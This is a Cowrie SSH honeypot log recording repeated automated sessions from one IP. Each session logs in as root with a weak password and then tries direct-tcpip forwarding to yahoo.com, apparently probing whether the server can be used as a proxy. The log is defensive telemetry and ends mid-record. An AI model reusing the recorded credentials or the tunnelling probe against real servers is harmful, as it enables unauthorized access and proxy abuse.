{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:52.833415Z","src_ip":"213.209.150.239","session":"60581b399fc4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:52.880555Z","src_ip":"213.209.150.239","session":"60581b399fc4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:53.115493Z","src_ip":"213.209.150.239","session":"60581b399fc4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":22088,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:22088","sensor":"my-vps","timestamp":"2025-08-26T01:04:53.163384Z","session":"60581b399fc4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:53.210773Z","src_ip":"213.209.150.239","session":"60581b399fc4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":16843,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:16843","sensor":"my-vps","timestamp":"2025-08-26T01:04:53.345407Z","session":"60581b399fc4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:53.392628Z","src_ip":"213.209.150.239","session":"60581b399fc4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:53.440979Z","src_ip":"213.209.150.239","session":"60581b399fc4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33706,"dst_ip":"1.2.3.4","dst_port":22,"session":"a11c962dd939","protocol":"ssh","message":"New connection: 213.209.150.239:33706 (1.2.3.4:22) [session: a11c962dd939]","sensor":"my-vps","timestamp":"2025-08-26T01:04:53.496714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:53.497867Z","src_ip":"213.209.150.239","session":"a11c962dd939"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:53.554956Z","src_ip":"213.209.150.239","session":"a11c962dd939"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:53.838265Z","src_ip":"213.209.150.239","session":"a11c962dd939"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":30020,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:30020","sensor":"my-vps","timestamp":"2025-08-26T01:04:53.896262Z","session":"a11c962dd939"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:53.953342Z","src_ip":"213.209.150.239","session":"a11c962dd939"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":27597,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:27597","sensor":"my-vps","timestamp":"2025-08-26T01:04:54.111153Z","session":"a11c962dd939"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:54.168340Z","src_ip":"213.209.150.239","session":"a11c962dd939"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:54.226964Z","src_ip":"213.209.150.239","session":"a11c962dd939"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33768,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c8f0f371723","protocol":"ssh","message":"New connection: 213.209.150.239:33768 (1.2.3.4:22) [session: 5c8f0f371723]","sensor":"my-vps","timestamp":"2025-08-26T01:04:54.283444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:54.284076Z","src_ip":"213.209.150.239","session":"5c8f0f371723"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:54.340899Z","src_ip":"213.209.150.239","session":"5c8f0f371723"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:54.624375Z","src_ip":"213.209.150.239","session":"5c8f0f371723"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":14539,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:14539","sensor":"my-vps","timestamp":"2025-08-26T01:04:54.682052Z","session":"5c8f0f371723"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:54.739318Z","src_ip":"213.209.150.239","session":"5c8f0f371723"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":26080,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:26080","sensor":"my-vps","timestamp":"2025-08-26T01:04:54.895213Z","session":"5c8f0f371723"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:54.952008Z","src_ip":"213.209.150.239","session":"5c8f0f371723"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:55.010500Z","src_ip":"213.209.150.239","session":"5c8f0f371723"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33819,"dst_ip":"1.2.3.4","dst_port":22,"session":"b13ad5d8e984","protocol":"ssh","message":"New connection: 213.209.150.239:33819 (1.2.3.4:22) [session: b13ad5d8e984]","sensor":"my-vps","timestamp":"2025-08-26T01:04:55.056681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:55.057881Z","src_ip":"213.209.150.239","session":"b13ad5d8e984"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:55.105182Z","src_ip":"213.209.150.239","session":"b13ad5d8e984"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:55.341387Z","src_ip":"213.209.150.239","session":"b13ad5d8e984"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":7533,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:7533","sensor":"my-vps","timestamp":"2025-08-26T01:04:55.390265Z","session":"b13ad5d8e984"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:55.437583Z","src_ip":"213.209.150.239","session":"b13ad5d8e984"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":28206,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:28206","sensor":"my-vps","timestamp":"2025-08-26T01:04:55.573657Z","session":"b13ad5d8e984"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:55.621139Z","src_ip":"213.209.150.239","session":"b13ad5d8e984"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:55.669379Z","src_ip":"213.209.150.239","session":"b13ad5d8e984"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33903,"dst_ip":"1.2.3.4","dst_port":22,"session":"61cec18c13b8","protocol":"ssh","message":"New connection: 213.209.150.239:33903 (1.2.3.4:22) [session: 61cec18c13b8]","sensor":"my-vps","timestamp":"2025-08-26T01:04:55.725224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:55.725906Z","src_ip":"213.209.150.239","session":"61cec18c13b8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:55.782801Z","src_ip":"213.209.150.239","session":"61cec18c13b8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:56.065515Z","src_ip":"213.209.150.239","session":"61cec18c13b8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":6329,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:6329","sensor":"my-vps","timestamp":"2025-08-26T01:04:56.122940Z","session":"61cec18c13b8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:56.179672Z","src_ip":"213.209.150.239","session":"61cec18c13b8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":7649,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:7649","sensor":"my-vps","timestamp":"2025-08-26T01:04:56.335121Z","session":"61cec18c13b8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:56.391770Z","src_ip":"213.209.150.239","session":"61cec18c13b8"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:56.449097Z","src_ip":"213.209.150.239","session":"61cec18c13b8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34063,"dst_ip":"1.2.3.4","dst_port":22,"session":"c782091bb0fa","protocol":"ssh","message":"New connection: 213.209.150.239:34063 (1.2.3.4:22) [session: c782091bb0fa]","sensor":"my-vps","timestamp":"2025-08-26T01:04:56.495214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:56.496430Z","src_ip":"213.209.150.239","session":"c782091bb0fa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-